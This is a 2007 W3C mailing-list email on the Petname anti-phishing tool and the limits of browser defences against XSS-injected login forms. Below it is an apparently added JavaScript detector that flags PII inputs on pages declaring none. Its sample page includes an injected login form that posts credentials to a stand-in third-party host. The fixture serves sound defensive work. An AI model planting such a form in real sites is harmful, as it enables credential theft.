- From: Close, Tyler J. <tyler.close@hp.com>
- Date: Thu, 29 Mar 2007 22:56:07 -0000
- To: <public-wsc-wg@w3.org>
Hi Shawn,

Shawn Duffy wrote:
> I'd be interested in hearing more about this... Do you have
> any URLs I could check out for some more background info?

I've implemented the Petname Tool part of the proposal as a Firefox addon. You can find it at:

https://addons.mozilla.org/en-US/firefox/addon/957

The only documentation I have for the rest of the proposal is the emails I've sent to this list. Hopefully we'll be spending a lot more time documenting this concept though. ;)

> I don't want to get too mired in the technical description
> but... I can see how this might foil a phishing "site", per
> se, but would it also be able to foil instances where a
> phishing form is injected via XSS into a trusted site?

Not as described in the email I sent. I think XSS attacks are problematic to solve in the web user agent. The problem is that the user agent really has no way of knowing whether or not a FORM was generated by the host on purpose, or by accident. There are both legitimate and nefarious reasons for changing the target of a FORM post.

I think there are some things that could be done at the HTML level to make page authors less vulnerable to XSS when quoting content received from others, but that's not in scope for this WG. For example, it would be nice to be able to declare in the <HEAD> of an HTML document that the <BODY> will not accept any PII identifiers. The browser could then notice the contradiction if, through an XSS attack, a login FORM is presented. Hopefully the new HTML WG will take on this topic.

Given the constraints of this WG's charter, I suspect we're only in position to do something about imposter web sites, rather than hacked web sites. That said, just doing something positive about imposter web sites is a big step forward.

Tyler
Received on Thursday, 29 March 2007 22:56:59 UTC
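The "no PII in the BODY" declaration sketched in the message above, worked through as an added example (not code from Tyler's Petname Tool or from any standard): a user-agent-side check that reads a hypothetical `<meta name="x-pii-policy" content="none">` from the `<head>` and reports any credential-style inputs that nevertheless appear in the `<body>`, as an injected login form would. The meta name, the field heuristics and the sample page are all assumptions constructed for the illustration.

```javascript
// Hypothetical declaration name; nothing in HTML defines this.
const PII_META_NAME = "x-pii-policy";
// Heuristics for inputs that collect credentials or other PII.
const PII_INPUT_TYPES = new Set(["password", "email", "tel"]);
const PII_AUTOCOMPLETE = new Set([
  "username", "current-password", "new-password", "email", "tel", "cc-number",
]);

// Parse the attributes of a single start tag into a lower-cased map.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4]).toLowerCase();
  }
  return attrs;
}

// True if <head> carries the (hypothetical) "this page takes no PII" declaration.
function declaresNoPii(html) {
  const head = /<head\b[^>]*>([\s\S]*?)<\/head>/i.exec(html);
  if (!head) return false;
  const metas = head[1].match(/<meta\b[^>]*>/gi) || [];
  return metas.some((tag) => {
    const a = parseAttrs(tag);
    return a.name === PII_META_NAME && a.content === "none";
  });
}

// All <input> elements in <body> that look like they collect PII.
function findPiiInputs(html) {
  const body = /<body\b[^>]*>([\s\S]*?)<\/body>/i.exec(html);
  const scope = body ? body[1] : html;
  const inputs = scope.match(/<input\b[^>]*>/gi) || [];
  return inputs.map(parseAttrs).filter(
    (a) => PII_INPUT_TYPES.has(a.type || "text") || PII_AUTOCOMPLETE.has(a.autocomplete || ""));
}

// The contradiction check: PII fields present despite a no-PII declaration.
function checkPiiContradiction(html) {
  return declaresNoPii(html) ? findPiiInputs(html) : [];
}

// Constructed sample: a page declaring no PII, with a login form injected into a comment.
const SAMPLE_PAGE = `<!doctype html><html><head>
<meta name="x-pii-policy" content="none"><title>News</title></head>
<body><h1>Comments</h1><p>Great article!</p>
<form action="https://third-party.example/collect" method="post">
<input name="user" type="text" autocomplete="username">
<input name="pw" type="password"><input type="submit" value="Log in"></form>
</body></html>`;

const findings = checkPiiContradiction(SAMPLE_PAGE);
console.log(findings.length ? `Warn: ${findings.length} PII field(s) despite no-PII declaration` : "OK");
```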